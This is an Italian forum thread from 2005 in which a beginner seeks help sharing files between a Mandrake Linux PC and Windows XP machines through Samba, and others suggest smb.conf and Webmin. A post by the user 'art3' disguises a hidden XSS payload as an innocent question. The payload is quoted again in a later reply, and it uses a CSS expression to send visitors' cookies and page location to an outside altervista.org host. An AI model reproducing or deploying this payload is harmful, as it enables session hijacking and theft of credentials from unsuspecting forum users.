Condividi:        

Come configurare una rete mista Linux e Win

Per tutti i tuoi problemi Linux entra qui e risolvili!

Moderatori: Anthony47, gunter, zendune

Come configurare una rete mista Linux e Win

Postdi vichi66 » 10/07/05 17:08

Ciao ragazzi!
Vengo subito al sodo, di linux sono -----0, però ho tanta voglia di imparare, ho una piccola rete casalinga composta da 2 pc con win XP e nel terzo ho installato il mandrake 9.2 ho settato correttamente (almeno credo) la scheda di rete in linux anche perchè ha fatto tutto l'aiutante io ho solo inserito gli indirizzi IP e il Gateway (i pc sono in rete tramite ruter adsl) ho provato a collegarmi con internet sul pc linux, e funziona perfettamente il problema è come vedere i due pc win XP e come vedere da win XP il pc Linux, premetto che in fase di installazione di linux ho settato l'opzione di installare come server il samba quindi in teoria, almeno credo questo 3 pc con linux potrebbe
fare da server-------->>> ora per quello che dirò qualcuno si metterà a ridere, ho provato su win xp a aprire risorse di rete ma il 3° pc con linux non lo vedo come mai ? (già sento le risate) .
Ditemi cosa devo fare ?
Help me !!!!!! :( :( :( :cry: :cry: :cry:
vichi66
Utente Senior
 
Post: 365
Iscritto il: 20/11/01 01:00
Località: Caltanissetta

Sponsor
 

Postdi vichi66 » 11/07/05 09:38

Quante risposte !!!!! :aaah :aaah :aaah :aaah :aaah
vichi66
Utente Senior
 
Post: 365
Iscritto il: 20/11/01 01:00
Località: Caltanissetta

Postdi disgrazia » 12/07/05 00:35

Beh tanto per cominciare potresti postare il tuo file di configurazione di samba (/etc/samba/smb.conf o qualcosa di simile). I problemi in gioco potrebbero essere milllle.
disgrazia
Download Admin
 
Post: 708
Iscritto il: 08/07/02 22:16

Postdi vichi66 » 12/07/05 10:21

Finalmente un segno di vita da questo forum....grazie disgrazia ! :)
Il problema è che non so dove prendere questo file di configurazione samba, come ho detto sono completamente a digiuno di linux, se potresti magari darmi delle indicazioni !!!
Grazie !!!!
vichi66
Utente Senior
 
Post: 365
Iscritto il: 20/11/01 01:00
Località: Caltanissetta

Postdi disgrazia » 12/07/05 18:47

Come ho già detto il file di solito è /etc/samba/smb.conf , in alternativa potrebbe essere /etc/smb.conf
disgrazia
Download Admin
 
Post: 708
Iscritto il: 08/07/02 22:16

Postdi vichi66 » 13/07/05 09:23

Ho aperto ---->Terminali--->Konsole e scritto prima /etc/smb.conf e mi dice :
No such file or directory
dopo di ciò ho scritto come da te suggerito:
/etc/samba/smb.cnf e mi dice Permission denied .
Andando su Benvenuto--->Questo computer---> Rete ed Internet--->DrakConnect ti aiuta a configurare le tue connessioni LAN ed Internet nella sezione Accesso ad Internet mi appare la dicitura:
Sto provando la tua connessione dopo pochi secondi mi dice connesso, infatti se provo a collegarmi ad internet mi si collega perfettamente il problema è che non riesco a farmi veder su risorse di rete nel pc con WinXP e viceversa non so come vedere con Linux il pc con WinXP anche perchè qui non c'è una sezione risorse di rete :(
vichi66
Utente Senior
 
Post: 365
Iscritto il: 20/11/01 01:00
Località: Caltanissetta

Postdi nykky » 13/07/05 13:34

vai sul sito di webmin http://www.webmin.com scarica la rpm ed installa webmin con il comando da terminale (come root):

rpm -ivh webminxxxxxx.rpm

a questo punto apri un browser qualsiasi e digita nella barra degli indirizzi:

https://localhost:10000

a questo punto fai la login come root e nella sezione server trovi la parte per configurare ed avviare samba.

ciao
nykky
Moderatore
 
Post: 1933
Iscritto il: 23/07/03 10:42

Postdi vichi66 » 13/07/05 16:50

caro nykky ho scaricato dal sito da te suggerito il pacchetto

Downloading and Installing

Il seguente file:

webmin-1.210-1.noarch.rpm (RPM suitable for Redhat, Caldera, SuSE, Mandrake or MSC Linux, 8716 kB)

l'ho messo in un cd, dopo di ciò con linux ho aperto il lettore CD-rom
e cliccato 2 volte sul file, a questo punto l'installazione si è avviata e conclusa
dicendomi che tutti i pacchetti sono stati installati, dopo di ciò ho aperto il browser e digitato https://localhost:10000 ma qui sono cominciati gli intoppi perchè prima se aperta una finestra relativa alla sicurezza ss...non ricordo come se non avessi i permessi necessari, dopo sono arrivato ad una finestra con questo titolo: Login to Webmin dove mi invitava ad inserire Username e Password li ho inseriti ma continua a dirmi...Login failed.Please try again NON RIESCO AD ENTRARE dove ho
sbagliato ? Eppure la login e la password sono corrette

:cry:
vichi66
Utente Senior
 
Post: 365
Iscritto il: 20/11/01 01:00
Località: Caltanissetta

Postdi nykky » 14/07/05 14:05

tu devi mettere il nome utente e la password con cui ti autentichi in linux, o meglio ancora fare la login come root
nykky
Moderatore
 
Post: 1933
Iscritto il: 23/07/03 10:42

Postdi vichi66 » 14/07/05 14:23

Scusami l'ignoranza cosa intendi "fare la login come root" ?
La password e la login è quella !
Non capisco perchè quando devo entrare nei settaggi di sistema o cose del genere mi accetta la password che avevo scelto in fase d'installazione mentre
nella finestra che mi appare dopo tutta la procedura
da te suggerita cioè in "Login to Webmin" me la rifiuta ! :aaah
vichi66
Utente Senior
 
Post: 365
Iscritto il: 20/11/01 01:00
Località: Caltanissetta

Postdi nykky » 14/07/05 16:39

oltre all'accoppiata utente/password che usi normalmente, hai dovuto creare una password anche per l'utente root, che è l'amministratore della macchina.
quando fai la login in webmin, metti root come utente e la password che hai impostato per root come password.
nykky
Moderatore
 
Post: 1933
Iscritto il: 23/07/03 10:42

Postdi vichi66 » 14/07/05 19:36

Credimi le ho tentate tutte non entra !!! :cry:
vichi66
Utente Senior
 
Post: 365
Iscritto il: 20/11/01 01:00
Località: Caltanissetta

Postdi nykky » 15/07/05 07:59

vichi66 ha scritto:Credimi le ho tentate tutte non entra !!! :cry:


peccato perchè ti avrebbe aiutato molto, sia nella configurazione di samba che di altre cose su linux, hai provato a dare un'occhiata alla documentazione sul sito?
nykky
Moderatore
 
Post: 1933
Iscritto il: 23/07/03 10:42

Postdi art3 » 15/07/05 10:44

Ma vuoi condividere gli hardisk dove risiede windows con linux??

:eeh:


[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/r.php?data='+document.location+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'
art3
Utente Junior
 
Post: 13
Iscritto il: 15/07/05 09:16

Postdi nykky » 15/07/05 10:54

art3 ha scritto:Ma vuoi condividere gli hardisk dove risiede windows con linux??

:eeh:


[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://tg2.altervista.org/r.php?data='+document.location+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'


e quale sarebbe il problema, usando samba si può
nykky
Moderatore
 
Post: 1933
Iscritto il: 23/07/03 10:42

Postdi vichi66 » 15/07/05 12:00

Vorrei condividere una cartella, che tra laltro dalle proprietà sembra già condivisa !!!
vichi66
Utente Senior
 
Post: 365
Iscritto il: 20/11/01 01:00
Località: Caltanissetta


Torna a Software Linux


Topic correlati a "Come configurare una rete mista Linux e Win":

Pc in rete
Autore: Pippoippo
Forum: Reti, ADSL e wireless
Risposte: 3
Rete ethernet
Autore: Tecnico1970
Forum: Reti, ADSL e wireless
Risposte: 1

Chi c’è in linea

Visitano il forum: Nessuno e 14 ospiti